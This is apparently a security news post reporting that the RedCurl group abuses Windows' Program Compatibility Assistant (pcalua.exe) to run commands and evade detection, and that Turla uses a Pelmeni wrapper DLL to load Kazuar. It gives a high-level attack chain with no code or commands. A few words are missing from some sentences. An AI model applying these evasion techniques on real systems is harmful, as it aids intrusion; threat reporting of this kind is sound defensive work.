Skip to content Skip to footer

RedCurl Cybercrime Group Exploits Windows PCA for Malicious Activities

The notorious group RedCurl, which primarily operates in -speaking countries, uses a legitimate component called the Program Compatibility Assistant (PCA) to carry out their malicious activities. According to a recent analysis by Trend Micro, this group has been exploiting the utility to bypass security restrictions and execute commands, making it difficult to detect their actions.

The Program Compatibility Assistant Service (pcalua.exe) is a service designed to identify and address compatibility issues with older programs. However, RedCurl has found a way to use this tool as an alternative command-line interpreter, allowing them to obscure their activities. This group, also known as Earth Kapre and Red Wolf, has been active since 2018 and targets entities in Australia, Canada, Germany, Russia, Slovenia, the U.K., Ukraine, and the U.S.

In a recent investigation, F.A.C.C.T. revealed that a central bank and an Australian company were targeted by RedCurl in November 2022 and May 2023, respectively. The group's attack chain involves sending emails with malicious attachments, using cmd.exe to download a legitimate utility called curl, and then using a loader (ms.dll or ps.dll) to establish a connection with a remote server. The malicious DLL file then uses PCA to spawn a downloader process, which connects to the same domain used by curl.

The group also uses the open-source software Impacket for unauthorized command execution. This tool, along with overlaps in the command-and-control infrastructure and similarities with known downloader artifacts, has concluded that RedCurl is behind these attacks.

This discovery highlights the ongoing threat posed by RedCurl, a group that targets a wide range of industries in multiple countries. Their sophisticated tactics, such as abusing PowerShell, curl, and PCA, show their dedication to evading detection in targeted networks.

In a separate incident, the nation-state group Turla is using a new wrapper DLL called Pelmeni to deploy the .NET-based Kazuar . This DLL, which masquerades as a legitimate library, is loaded through DLL and decrypts and launches Kazuar. This tactic makes it difficult for security measures to detect malicious activity.

These recent developments serve as a reminder of the constant threat posed by cybercriminals and the need for organizations to stay vigilant and up-to-date with the latest security measures. 

Leave a comment

Newsletter Signup
Address

The Grid —
The Matrix Has Me
Big Bear Lake, CA 92315

01010011 01111001 01110011 01110100 01100101 01101101 00100000
01000110 01100001 01101001 01101100 01110101 01110010 01100101

- Kate: You're not in my class.
- Dade: Gimme time.
Kate & Dade

Deitasoft © 2024. All Rights Reserved.